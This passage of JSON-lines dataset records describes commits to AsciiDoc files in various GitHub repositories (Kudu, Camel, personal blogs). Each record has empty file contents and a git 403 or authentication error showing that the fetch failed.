profile\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"draft_trex_stateless.asciidoc","new_file":"draft_trex_stateless.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1bedb99b8d397caadd1151bcfffee37856c9e5bd","subject":"Delete 2016-5-13-Engineer-Career-Path.adoc","message":"Delete 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-5-13-Engineer-Career-Path.adoc","new_file":"2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f17eef70225302cc891bff0ddceac8603175962","subject":"Update 2015-5-10-uGui.adoc","message":"Update 2015-5-10-uGui.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-5-10-uGui.adoc","new_file":"_posts\/2015-5-10-uGui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20be43b140fea07a4903af818d8e8e707eef8a5c","subject":"html styling","message":"html styling\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"html.adoc","new_file":"html.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"335fa6ad833462b4c9eccd67c8a3b22608024c0f","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df0a91f7276680406b904bb5011219378d11a0fe","subject":"Update 2017-02-25-blog-tiwqeqweqeqwqeqq.adoc","message":"Update 2017-02-25-blog-tiwqeqweqeqwqeqq.adoc","repos":"neurodiversitas\/neurodiversitas.github.io,neurodiversitas\/neurodiversitas.github.io,neurodiversitas\/neurodiversitas.github.io,neurodiversitas\/neurodiversitas.github.io","old_file":"_posts\/2017-02-25-blog-tiwqeqweqeqwqeqq.adoc","new_file":"_posts\/2017-02-25-blog-tiwqeqweqeqwqeqq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neurodiversitas\/neurodiversitas.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fa9abbfd11dadd262e3b3bdb352530ddccb62a3","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12453895190d3581380fbee2fe39453b56b64c50","subject":"Added README.adoc symlink for Github.","message":"Added README.adoc symlink for Github.\n","repos":"Yubico\/u2fval-client-php","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/u2fval-client-php.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"421f7ecd4def40f0eb90b9916f8c0f63eadaa7c7","subject":"Fix typo in ASAN cmake command","message":"Fix typo in ASAN cmake command\n\nChange-Id: I049679199d9fd3398a857f89a0e919e7bac1c628\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12098\nTested-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8d34e186109a4bf7803a0e63ac509bb21ea8c1e9","subject":"Readme.adoc","message":"Readme.adoc\n","repos":"trisberg\/jdbc,spring-cloud-stream-app-starters\/jdbc,trisberg\/jdbc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trisberg\/jdbc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9f65fda24773a4a82dbe23f482e4e1f3ddd7965","subject":"Add README.adoc","message":"Add README.adoc\n","repos":"DaveDavenport\/MultiMonitorBackground","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DaveDavenport\/MultiMonitorBackground.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"719733e28c6f522eb95f0b782a5dc5441cba1fe8","subject":"Updated docs","message":"Updated 
docs\n","repos":"spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c01a76e479720f94537237cd92ab04e38c30c5bd","subject":"Add README file","message":"Add README file\n","repos":"rgielen\/action-framework-comparison,rgielen\/action-framework-comparison,ivargrimstad\/action-framework-comparison,ivargrimstad\/action-framework-comparison","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rgielen\/action-framework-comparison.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66815be1c796d8a9e677df49e92f605a636e39ec","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"915a6ffb06922b9fbdbc2a3b3b33ad4f2b84171e","subject":"Add main doc","message":"Add main doc\n","repos":"cunningt\/camel,tdiesler\/camel,pax95\/camel,cunningt\/camel,christophd\/camel,gnodet\/camel,mcollovati\/camel,pmoerenhout\/camel,mcollovati\/camel,pmoerenhout\/camel,christophd\/camel,pax95\/camel,adessaigne\/camel,tdiesler\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,cunningt\/camel,tadayosi\/camel,adessaigne\/camel,pax95\/camel,mcollovati\/camel,tadayosi\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,alvinkwekel\/camel,nicolaferraro\/camel,christophd\/camel,gnodet\/camel,tadayosi\/camel,nikhilvibhav\/camel,christophd\/camel,adessaigne\/camel,tadayosi\/camel,pmoerenhout\/camel,apache\/camel,mcollovati\/camel,tdiesler\/camel,nicolaferraro\/camel,adessaigne\/camel,adessaigne\/camel,adessaigne\/camel,gnodet\/camel,cunningt\/camel,apache\/camel,apache\/camel,pax95\/camel,nicolaferraro\/camel,pmoerenhout\/camel,tdiesler\/camel,christophd\/camel,nicolaferraro\/camel,cunningt\/camel,apache\/camel,pax95\/camel,gnodet\/camel,christophd\/camel,nikhilvibhav\/camel,tadayosi\/camel,tdiesler\/camel,cunningt\/camel,apache\/camel,apache\/camel,pax95\/camel,alvinkwekel\/camel,gnodet\/camel,tadayosi\/camel,alvinkwekel\/camel,pmoerenhout\/camel,tdiesler\/camel","old_file":"core\/camel-main\/src\/main\/docs\/main.adoc","new_file":"core\/camel-main\/src\/main\/docs\/main.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0e8f713d94568dcd1cd6c8c5de888918377737ef","subject":"y2b create post 12-inch Retina MacBook Giveaway!","message":"y2b create post 12-inch Retina MacBook Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-14-12inch-Retina-MacBook-Giveaway.adoc","new_file":"_posts\/2015-07-14-12inch-Retina-MacBook-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31288976eee9d1217e66d34829e4c519d4b0e37a","subject":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","message":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddf81f8c8f103cd0fc23bd741cd1437eb9f9a9af","subject":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","message":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b4a76aeb118859d4bab91fa870a9d9bcad2f87d","subject":"Update 2016-05-06-Kinds-of-Static-analysis-tools.adoc","message":"Update 2016-05-06-Kinds-of-Static-analysis-tools.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-05-06-Kinds-of-Static-analysis-tools.adoc","new_file":"_posts\/2016-05-06-Kinds-of-Static-analysis-tools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ab3ca04ad54f3f15a3d045ea9cc015dfccb5553","subject":"y2b create post The Ultimate Slim Wallet","message":"y2b create post The Ultimate Slim 
Wallet","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-12-The-Ultimate-Slim-Wallet.adoc","new_file":"_posts\/2016-05-12-The-Ultimate-Slim-Wallet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29e87d18b7fecb7afef6aef19ba86eeee16901bd","subject":"Update 2016-08-11-On-their-Way.adoc","message":"Update 2016-08-11-On-their-Way.adoc","repos":"NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io","old_file":"_posts\/2016-08-11-On-their-Way.adoc","new_file":"_posts\/2016-08-11-On-their-Way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"246e16d6fce1a84d642d822fd13215c11ae2cb9b","subject":"Update 2018-03-14-test20180314.adoc","message":"Update 2018-03-14-test20180314.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-14-test20180314.adoc","new_file":"_posts\/2018-03-14-test20180314.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b27b2dfdc2172673a458ed6e9b4ca828a7bc9780","subject":"Amended JUnit 5 support module documentation with note about multi-browser usage of @ConfigurationValue","message":"Amended JUnit 5 support module documentation with note about multi-browser usage of @ConfigurationValue\n","repos":"slu-it\/webtester2-core,slu-it\/webtester2-core,testIT-WebTester\/webtester2-core,slu-it\/webtester2-core,testIT-WebTester\/webtester2-core,testIT-WebTester\/webtester2-core","old_file":"webtester-documentation\/src\/main\/asciidoc\/chapters\/support-module-junit5.asciidoc","new_file":"webtester-documentation\/src\/main\/asciidoc\/chapters\/support-module-junit5.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/slu-it\/webtester2-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"117c6b496a1ef5fff6f18a079b69b4b2eb4e9dac","subject":"new icons font strategy for next major release 4.0","message":"new icons font strategy for next major release 4.0\n","repos":"llaville\/asciidoc-bootstrap-backend,llaville\/asciidoc-bootstrap-backend","old_file":"docs\/iconsfont.asciidoc","new_file":"docs\/iconsfont.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/llaville\/asciidoc-bootstrap-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4c22e9121b1ca148e334a7481093304139d0dfdf","subject":"A couple of 1.6 release notes","message":"A couple of 1.6 
release notes\n\nChange-Id: Ia69cc1904b5e1a81fecf20a2ca5a8fb1908a6025\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8702\nTested-by: Kudu Jenkins\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aa9418585864588abc5cadcc753bbde0cb327798","subject":"Another pass on 0.10.0 release notes","message":"Another pass on 0.10.0 release notes\n\nChange-Id: I4414bdebb15d976c025dfce5a3f2bda5768bd5a9\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/3979\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"df5c7a1ed49e6fb9f5f831f0c98c650aa2646475","subject":"Add more release notes for new features in 1.0","message":"Add more release notes for new features in 1.0\n\nChange-Id: Ideac208aa377b52cc9910c05a9fa4d25a333d49a\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4370\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon 
<2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73769de27155552fa0581e6cd141c268f62202d4","subject":"CAMEL-14065: Add tiny readme in components folder with linksto website like on root readme file.","message":"CAMEL-14065: Add tiny readme in components folder with linksto website like on root readme file.\n","repos":"DariusX\/camel,zregvart\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tadayosi\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,gnodet\/camel,DariusX\/camel,tdiesler\/camel,pax95\/camel,pax95\/camel,DariusX\/camel,pax95\/camel,gnodet\/camel,pax95\/camel,christophd\/camel,christophd\/camel,tdiesler\/camel,CodeSmell\/camel,cunningt\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,tadayosi\/camel,tdiesler\/camel,adessaigne\/camel,apache\/camel,pmoerenhout\/camel,gnodet\/camel,cunningt\/camel,zregvart\/camel,apache\/camel,christophd\/camel,pax95\/camel,apache\/camel,ullgren\/camel,CodeSmell\/camel,tadayosi\/camel,mcollovati\/camel,objectiser\/camel,pmoerenhout\/camel,adessaigne\/camel,tadayosi\/camel,CodeSmell\/camel,ullgren\/camel,christophd\/camel,DariusX\/camel,nikhilvibhav\/camel,gnodet\/camel,mcollovati\/camel,CodeSmell\/camel,tadayosi\/camel,apache\/camel,cunningt\/camel,tdiesler\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,zregvart\/camel,adessaigne\/camel,apache\/camel,gnodet\/camel,cunningt\/camel,pax95\/camel,mcollovati\/camel,objectiser\/camel,pmoerenhout\/camel,christophd\/camel,nicolaferraro\/camel,pmoerenhout\/camel,tdiesler\/camel,adessaigne\/camel,adessaigne\/camel,tadayosi\/camel,alvinkwekel\/camel,alvinkwekel\/camel,mcollovati\/camel,christophd\/camel,ullgren\/camel,tdiesler\/camel,adessaigne\/camel,objectiser\/camel,zregvart\/camel,alvinkwekel\/camel,objectiser\/camel,nicolaferraro\/camel,cunningt\/camel,apache\/camel,cunningt\/camel,ullgren\/camel","old_file":"components\/readme.adoc","new_file":"components\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ecd30af38a85c5e0c1e3fd395c895c814dbc8a0d","subject":"Comments","message":"Comments\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested 
URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e18c0ccff7498dc053c154a051b3980b015005b7","subject":"docs: git: fix example","message":"docs: git: fix example\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/git-storage.adoc","new_file":"docs\/git-storage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b727489eb787f9d0667192bb1160ed64e2aa70b","subject":"add document for KUDU-2080","message":"add document for KUDU-2080\n\nChange-Id: I7a802a846ad5ec93ce4e0022ec279f1b4c6cc5db\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12774\nTested-by: Kudu Jenkins\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\n","repos":"helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/known_issues.adoc","new_file":"docs\/known_issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6266fec0e7ff98106dec86d19af5bddbe10ed3d7","subject":"Initial revision of the IcmpMonitor monitor.","message":"Initial revision of the IcmpMonitor monitor.\n\nCyrille\n","repos":"aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/IcmpMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/IcmpMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tdefilip\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"e69df991176845f454de62c8b0af31035bd12062","subject":"Update 2016-11-01-Mapping-in-JPA.adoc","message":"Update 2016-11-01-Mapping-in-JPA.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-11-01-Mapping-in-JPA.adoc","new_file":"_posts\/2016-11-01-Mapping-in-JPA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5491e7eaeb3461a8fc273e6a09cf11735f0530c7","subject":"Update 2018-06-25-quick-rebel.adoc","message":"Update 
2018-06-25-quick-rebel.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-06-25-quick-rebel.adoc","new_file":"_posts\/2018-06-25-quick-rebel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16472ed9381cb2d16df08dea48d38b85748945cc","subject":"Update 2018-10-12-Laravel-D-B.adoc","message":"Update 2018-10-12-Laravel-D-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-12-Laravel-D-B.adoc","new_file":"_posts\/2018-10-12-Laravel-D-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9487a2e72ddf8e38f9e4215e056f72aa477f0c75","subject":"Update 2015-07-15-Android-Intent-Image-Picker.adoc","message":"Update 